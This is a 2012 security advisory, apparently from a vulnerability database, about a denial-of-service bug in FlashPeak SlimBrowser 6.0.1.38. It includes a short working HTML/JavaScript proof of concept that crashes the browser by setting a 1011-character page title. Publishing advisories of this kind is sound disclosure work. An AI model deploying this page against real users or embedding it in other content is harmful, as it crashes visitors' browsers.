FlashPeak SlimBrowser 6.0.1.38 Denial Of Service

2012.05.17
Credit: demonalex
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability Software : FlashPeak SlimBrowser Software Version : 6.0.1.38 Vendor: FlashPeak Inc.(www.flashpeak.com/) Vulnerability Published : 2012-05-16 Vulnerability Update Time : Status : Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P) Bug Description : FlashPeak SlimBrowser is a web browser Software for FREE. FlashPeak SlimBrowser contains one denial of service vulnerability about surfing a html file has a long web TITLE by remote or locality. Proof Of Concept : ----------------------------------------------------------- <html> <head> <title>evil page</title> <body bgcolor="black"> <script type="text/javascript"> function a7(){ var buffer = ""; for (var i = 0; i < 1011; i++) { buffer += "A"; } document.title = buffer; } </script> </head> <body> <font color="white"> <h5>==> <a href="javascript:a7();">'A'x1011</a> <==</h5><br> <font> </body> </html> ----------------------------------------------------------- Credits : This vulnerability was discovered by demonalex(at)163(dot)com mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk Pentester/Researcher Dark2S Security Team/PolyU.HK

References:

http://www.flashpeak.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top